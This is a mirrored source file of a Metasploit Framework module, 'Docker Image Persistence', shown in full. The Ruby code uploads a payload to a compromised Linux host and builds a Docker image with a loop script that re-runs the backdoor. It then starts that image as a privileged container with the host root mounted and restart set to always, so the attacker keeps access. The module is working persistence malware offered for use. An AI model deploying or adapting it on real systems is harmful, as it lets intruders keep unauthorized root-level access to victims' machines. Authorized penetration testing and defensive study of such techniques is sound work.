Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/persistence/docker_image.rb
23592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Unix

11
  include Msf::Exploit::EXE # for generate_payload_exe

12
  include Msf::Exploit::FileDropper

13
  include Msf::Exploit::Local::Persistence

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Docker Image Persistence',

21
        'Description' => %q{

22
          This module maintains persistence on a host by creating a docker image which runs our

23
          payload, and has access to the host's file system (/host in the container). Whenever the

24
          container restarts, the payload will run, or when the payload dies the executable

25
          will run again after a delay. This will allow for writing back

26
          into the host through cron entries, ssh keys, or other method.

27


28
          Verified on Ubuntu 22.04.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'h00die',

33
        ],

34
        'Platform' => [ 'linux' ],

35
        'Arch' => [

36
          # ARCH_CMD, can't always guarantee that curl and other things are on system, so binary is best

37
          ARCH_X86,

38
          ARCH_X64,

39
          ARCH_ARMLE,

40
          ARCH_AARCH64,

41
          ARCH_PPC,

42
          ARCH_MIPSLE,

43
          ARCH_MIPSBE

44
        ],

45
        'SessionTypes' => [ 'meterpreter' ],

46
        'Targets' => [[ 'Auto', {} ]],

47
        'References' => [

48
          ['ATT&CK', Mitre::Attack::Technique::T1610_DEPLOY_CONTAINER],

49
        ],

50
        'DisclosureDate' => '2013-03-20', # docker's release date

51
        'DefaultTarget' => 0,

52
        'Notes' => {

53
          'Stability' => [CRASH_SAFE],

54
          'Reliability' => [REPEATABLE_SESSION],

55
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]

56
        }

57
      )

58
    )

59


60
    register_options(

61
      [

62
        OptInt.new('SLEEP', [false, 'How many seconds to sleep before re-executing payload', 600]),

63
      ]

64
    )

65
  end

66


67
  def check

68
    # we don't need this check since the payload is in the docker image

69
    # print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')

70
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)

71
    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)

72
    return CheckCode::Safe('docker is required') unless command_exists?('docker')

73


74
    vprint_status('Checking Docker availability and permissions...')

75


76
    output = cmd_exec('docker ps 2>&1')

77


78
    if output.include?('permission denied')

79
      return CheckCode::Safe('Docker is installed but this user does not have permission to access it')

80
    elsif output.include?('Cannot connect to the Docker daemon') || output.include?('Is the docker daemon running?')

81
      return CheckCode::Detected('Docker appears to be installed but the daemon is not running')

82
    end

83


84
    CheckCode::Detected('docker app is installed and accessible')

85
  end

86


87
  def install_persistence

88
    # Step 1: Prepare payload

89
    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)

90
    backdoor = "#{writable_dir}/#{file_name}"

91
    vprint_status("Writing backdoor to #{backdoor}")

92
    upload_and_chmodx(backdoor, generate_payload_exe)

93


94
    # Step 2: Prepare entrypoint script (loops indefinitely)

95
    sleep_time = datastore['SLEEP']

96
    entry_script = <<~SCRIPT

97
      #!/bin/sh

98
      while true; do

99
        if [ -x /usr/local/bin/#{file_name} ]; then

100
          # Check if it's already running

101
          if ! pgrep -f "/usr/local/bin/#{file_name}" >/dev/null 2>&1; then

102
            /usr/local/bin/#{file_name} &

103
          fi

104
        fi

105
        sleep #{sleep_time}

106
      done

107
    SCRIPT

108


109
    entry_file = "#{writable_dir}/entrypoint.sh"

110
    unless write_file(entry_file, entry_script)

111
      fail_with(Failure::UnexpectedReply, "Unable to write #{entry_file}")

112
    end

113
    chmod(entry_file, 0o755)

114


115
    # Step 3: Pull Alpine image

116
    cmd_exec('docker pull alpine')

117


118
    # Step 4: Create a temporary container (stopped) to copy files in

119
    tmp_container = cmd_exec('docker run -dit alpine sh').strip

120
    vprint_status("Temporary container created: #{tmp_container}")

121


122
    # Copy payload and entrypoint into container

123
    cmd_exec("docker cp #{backdoor} #{tmp_container}:/usr/local/bin/#{file_name}")

124
    cmd_exec("docker cp #{entry_file} #{tmp_container}:/")

125


126
    cmd_exec("docker exec #{tmp_container} chmod +x /usr/local/bin/#{file_name}")

127
    cmd_exec("docker exec #{tmp_container} chmod +x /entrypoint.sh")

128


129
    # Commit a new persistent image

130
    persistent_image = "alpine_#{Rex::Text.rand_text_alpha_lower(5..8)}"

131
    cmd_exec("docker commit #{tmp_container} #{persistent_image}")

132
    print_good("Persistent image created: #{persistent_image}")

133


134
    # Remove temporary container

135
    cmd_exec("docker rm #{tmp_container}")

136


137
    # Step 5: Start container with internal entrypoint

138
    container_id = cmd_exec("docker run -dit --privileged -v /:/host --restart=always #{persistent_image} /entrypoint.sh").strip

139
    print_good("Container started with internal entrypoint: #{container_id}")

140


141
    # Step 6: Add cleanup commands for RC

142
    @clean_up_rc << "execute -f /bin/sh -a \"-c 'docker stop #{container_id}'\" -i -H"

143
    @clean_up_rc << "execute -f /bin/sh -a \"-c 'docker rm #{container_id}'\" -i -H"

144
    @clean_up_rc << "execute -f /bin/sh -a \"-c 'docker rmi #{persistent_image}'\" -i -H"

145


146
    # Step 7: Clean up host temp files

147
    rm_f(backdoor)

148
    rm_f(entry_file)

149


150
    # Step 8: Stop tmp image

151
    print_status('Stopping and removing temp container')

152
    cmd_exec("docker stop #{tmp_container}")

153
    cmd_exec("docker rm #{tmp_container}")

154


155
    print_status("Payload installed and running with #{sleep_time}-second loop in container")

156
  end

157


158
end

159


160